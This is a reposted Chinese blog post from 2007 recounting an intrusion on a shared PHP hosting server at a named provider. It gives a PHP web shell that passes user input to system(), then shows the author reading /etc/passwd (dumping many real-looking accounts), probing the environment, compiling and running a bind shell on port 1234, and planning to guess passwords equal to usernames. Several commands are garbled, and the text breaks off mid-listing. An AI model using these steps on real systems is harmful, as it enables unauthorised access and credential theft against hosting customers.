構建Linux下的安全,PHP配置漏洞攻擊(轉)

RegisterForBlog發表於2007-09-19
LinuxPHP
構建Linux下的安全,PHP配置漏洞攻擊(轉)[@more@]

  這些站點的問題主要出在允許使用system(),exec()等等這些函式,熟悉php的朋友應該知道,這些函式是呼叫系統指令的(雖然透過web server php程式只能有nobody許可權),而且一般使用者只要申請一個空間就可以獲取區域性的可寫許可權,令使用者可以寫一個web shell程式執行命令.在這些伺服器上一般使用者不能夠登陸,也就是nologin(沒有登陸shell,管理員可沒那麼"慷慨"!),這樣利用system(),exec()這些函式就可以bind一個shell出來~!本文以虎翼網()的空間為例子(他是不是所有的伺服器都有這個毛病我不知道~我只試驗了我的空間所在的伺服器):

  1.寫一個webshell先(php很容易做到)

  ?>php

  #shell.php3

  echo"
";
  system("$cmd");
  echo"
";
  ?>
  2.上傳到空間
  3.執行(具體的伺服器馬賽克處理)
  lynx  (看一下許可權到底多大)
  uid=171047(xxxx) gid=51(xxx) groups=51(xxx), 65534(nobody)
  root真的很吝嗇啊!
  lynx  -ras(看看系統)
  FreeBSD xxx.51.net 3.3-RELEASE FreeBSD 3.3-RELEASE #11: Tue Mar 20
  00:58:09 CST 2001 root@51.net:/usr/src/sys/compile/51NET i386
  lynx 
  /etc/passwd(shadow是鐵定看不到)
  root:*:0:0:Charlie &:/root:/bin/csh
  toor:*:0:0:Bourne-again Superuser:/root:
  daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
  operator:*:2:5:System &:/:/sbin/nologin
  bin:*:3:7:Binaries Commands and Source,,,:/:/sbin/nologin
  tty:*:107353:51:USER:/home/tty:/local/bin/null
  kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin
  games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin
  news:*:8:8:News Subsystem:/:/sbin/nologin
  man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin
  bind:*:53:53:Bind Sandbox:/:/sbin/nologin
  uucp:*:66:66:UUCP
  pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
  xten:*:67:67:X-10 daemon:/usr/local/xten:/sbin/nologin
  pop:*:68:6:Post Office Owner:/nonexistent:/sbin/nologin
  ftp:*:70:70:FTP Daemon:/nonexistent:/sbin/nologin
  nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin
  quotauser1:*:997:51:quotauser:/home/quotauser1:/sbin/nologin
  quotauser2:*:998:51:quotauser:/home/quotauser2:/sbin/nologin
  quotauser3:*:999:51:quotauser:/home/quotauser3:/sbin/nologin
  tian:*:1002:1002::/local/tian:/local/bin/ksh
  sysadmin:*:1001:1001:System
  Administrator:/local/sysadmin:/local/bin/ksh
  test2:*:9999:51::/home/test2:/local/bin/null
  xhjj:*:106200:51:USER:/home/xhjj:/sbin/nologin
  zhinan:*:106201:51:USER:/home/zhinan:/local/bin/null
  yes2:*:106202:51:USER:/home/yes2:/local/bin/null
  daboy:*:106203:51:USER:/home/daboy:/local/bin/null
  yesky:*:106204:51:USER:/home/yesky:/local/bin/null
  yesk:*:106205:51:USER:/home/yesk:/local/bin/null
  lnsyzzg:*:106206:51:USER:/home/lnsyzzg:/local/bin/null
  fog:*:106207:51:USER:/home/fog:/local/bin/null
  renshou:*:106208:51:USER:/home/renshou:/local/bin/null
  hilen:*:106209:51:USER:/home/hilen:/local/bin/null
  hapybird:*:106210:51:USER:/home/hapybird:/sbin/nologin
  xiewei:*:106211:51:USER:/home/xiewei:/sbin/nologin
  wwwer:*:106212:51:USER:/home/wwwer:/local/bin/null
  larry:*:106213:51:USER:/home/larry:/local/bin/null
  sunboys:*:106214:51:USER:/home/sunboys:/local/bin/null
  everydayyuki:*:106215:51:USER:/home/everydayyuki:/local/bin/null
  linguanxi:*:106216:51:USER:/home/linguanxi:/local/bin/null
  baobao:*:106217:51:USER:/home/baobao:/local/bin/null
  chaoshan:*:106218:51:USER:/home/chaoshan:/local/bin/null
  hrstudio:*:106219:51:USER:/home/hrstudio:/local/bin/null
  dengxian:*:106220:51:USER:/home/dengxian:/local/bin/null
  simonstone:*:106221:51:USER:/home/simonstone:/local/bin/null
  chenjian:*:106222:51:USER:/home/chenjian:/local/bin/null
  lvxiangml:*:106223:51:USER:/home/lvxiangml:/local/bin/null
  zzbxaxa:*:106224:51:USER:/home/zzbxaxa:/local/bin/null
  pc2000:*:106225:51:USER:/home/pc2000:/local/bin/null
  startexcel:*:106226:51:USER:/home/startexcel:/local/bin/null
  model:*:106227:51:USER:/home/model:/local/bin/null
  leogirl:*:106228:51:USER:/home/leogirl:/local/bin/null
  fohcn:*:106229:51:USER:/home/fohcn:/local/bin/null
  ljok:*:106230:51:USER:/home/ljok:/local/bin/null
  baorui:*:106231:51:USER:/home/baorui:/local/bin/null
  fky-jack:*:106232:51:USER:/home/fky-jack:/local/bin/null
  zhaowen:*:106233:51:USER:/home/zhaowen:/local/bin/null
  xiaojiaoya:*:106234:51:USER:/home/xiaojiaoya:/local/bin/null
  zyinter:*:106235:51:USER:/home/zyinter:/local/bin/null
  power:*:106236:51:USER:/home/power:/local/bin/null
  feefan:*:106237:51:USER:/home/feefan:/local/bin/null
  paradise:*:106238:51:USER:/home/paradise:/local/bin/null
  wulc:*:106239:51:USER:/home/wulc:/local/bin/null
  jcm:*:106240:51:USER:/home/jcm:/local/bin/null
  liangxiaom:*:106241:51:USER:/home/liangxiaom:/local/bin/null
  jingder:*:106242:51:USER:/home/jingder:/local/bin/null
  hanjun:*:106243:51:USER:/home/hanjun:/local/bin/null
  adai:*:106244:51:USER:/home/adai:/local/bin/null
  fightben:*:106245:51:USER:/home/fightben:/local/bin/null
  lihonghui-ooo:*:106246:51:USER:/home/lihonghui-ooo:/local/bin/null
  xeno:*:106247:51:USER:/home/xeno:/local/bin/null
  ..................(太多了~省略)
  只有幾個使用者有shell可以登陸,cp到我的目錄下面,等一下分離出usrename看看有沒有人username=passwd的~呵呵~
  lynx 
  HOME=/
  PS1=$
  OPTIND=1
  PS2=>
  PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin
  IFS=
  好差的"環境",被設定成這樣....
  lynx  /etc/hosts
  # $FreeBSD: src/etc/hosts,v 1.9.2.1 1999/08/29 14:18:44 peter Exp $
  #
  # Host Database
  # This file should contain the addresses and aliases
  # for local hosts that share this file.
  # In the presence of the domain name service or NIS, this file may
  # not be consulted at all; see /etc/host.conf for the resolution
  order.
  #
  #
  127.0.0.1 localhost localhost.my.domain myname.my.domain
  #
  # Imaginary network.
  #10.0.0.2 myname.my.domain myname
  #10.0.0.3 myfriend.my.domain myfriend
  #
  # According to RFC 1918, you can use the following IP networks for
  # private nets which will never be connected to the Internet:
  #
  # 10.0.0.0 - 10.255.255.255
  # 172.16.0.0 - 172.31.255.255
  # 192.168.0.0 - 192.168.255.255
  #
  #
  不算太小啊~hosts ~
  lynx  -b gcc
  (老天保佑~有gcc)
  gcc:/usr/sbin/gcc(萬歲!!!!!!!!!!!!)
  我來試試看~弄一個大傢伙上去,編譯一下,哈哈~速度好快!
  webshell太累了,bind一個shell出來方便一點...(上傳binshell程式,自己寫也可以用perl/C,都不太難)
  lynx  -o bind bindshell.c
  lynx  1234
  bind shell too port 1234
  telnet xxx.51.net 1234
  .....下面省略,反正就可以執行命令了
  嗯~好像這臺沒裝MySQL,可惜~呵呵~~~~~~~~~,對了oso.com.cn的好像有~,不過最近停了.....
  lynx  -p
  localhost
  portmapper 100000 portmap sunrpc
  rstatd 100001 rstat rstat_svc rup perfmeter
  rusersd 100002 rusers
  nfs 100003 nfsprog
  ypserv 100004 ypprog
  mountd 100005 mount showmount
  ypbind 100007
  walld 100008 rwall shutdown
  yppasswdd 100009 yppasswd
  etherstatd 100010 etherstat
  rquotad 100011 rquotaprog quota rquota
  sprayd 100012 spray
  3270_mapper 100013
  rje_ma
   

·上一篇:
·下一篇: 







 









     最新更新









·
·
·
·
·
·
·
·
·
·
·
·
·
·
·
·
·
·
·
·
·
·
·
·
·
·
·
·
·
·

















 | | | | | | | 















Copyright © 2004 - 2007 All Rights Reserved




來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/10763080/viewspace-970146/,如需轉載,請註明出處,否則將追究法律責任。






0


0








上一篇:
WEB開發之提升JSP應用程式的七大絕招(轉)




下一篇:
透析駭客攻擊技術之滲透防火牆的Shellcode(轉)













構建Linux下的安全,PHP配置漏洞攻擊(轉)



請登入後發表評論

登入









全部評論 























RegisterForBlog






    

  • 

    博文量
    
295

    • 

  • 

    訪問量
    

    1603562
    

    • 










最新文章






























支援我們
作者招募
使用者協議
FAQ
Contact Us





北京盛拓優訊資訊科技有限公司. 版權所有  京ICP備16024965號-8 北京市公安局海淀分局網監中心備案編號:11010802021510 niuxiaotong@pcpop.com 17352615567  未成年人舉報專區


廣播電視節目製作經營許可證(京) 字第1234號 中國網際網路協會會員












相關文章